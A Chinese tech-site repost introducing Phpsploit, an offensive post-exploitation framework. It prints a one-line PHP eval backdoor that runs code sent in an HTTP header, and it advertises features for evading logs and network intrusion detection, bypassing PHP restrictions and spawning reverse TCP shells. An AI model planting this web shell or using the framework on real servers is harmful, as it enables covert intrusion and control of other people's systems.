首页 > 后端开发 > php教程 > Phpsploit:隐蔽的Post-Exploitation框架

Phpsploit:隐蔽的Post-Exploitation框架

WBOY
发布: 2016-06-23 13:19:53
原创
1544 人浏览过

Phpsploit是一个远程控制框架,为客户端与服务器间提供shell交互连接。能够对Getshell的服务器进行管理实现权限提升。

Phpsploit利用多形态后门通道使模糊化通信机制通过客户端请求和WEB服务端响应中的HTTP头实现:

<? @eval($_SERVER['HTTP_PHPSPL01T']) ?>
登录后复制

特性:

高效 :可使用20多款插件实现post-exploitation任务自动化

  执行命令、浏览文件系统、绕过PHP安全限制;  在目标主机与客户端之间执行文件上传、下载操作;  通过本地编辑器来编辑远程主机上的文件;  在远程主机上运行数据库控制台;  产生反向TCP shell。
登录后复制

隐蔽性:

  不易被日志分析、NIDS特征检测所识别;  能够绕过安全模式和常见的PHP安全限制;  通信内容隐藏在HTTP头中;  payloads经过混淆来饶过NIDS;  支持http/https/socks4/socks5代理。
登录后复制

便携性:

  在客户端和服务端实现跨平台;  强大的界面、多命令支持;  支持会话保存、载入,提供历史记录功能;
登录后复制

支持系统:

GNU\LinuxMac OS XWindows
登录后复制

*信息来源: Kitploit 项目地址: GitHub 0xroot编译整理内容有所删减,转载请注明来自FreeBuf黑客与极客(FreeBuf.COM)

来源:php.cn
本站声明
本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系admin@php.cn
热门教程
更多>
最新下载
更多>
网站特效
网站源码
网站素材
前端模板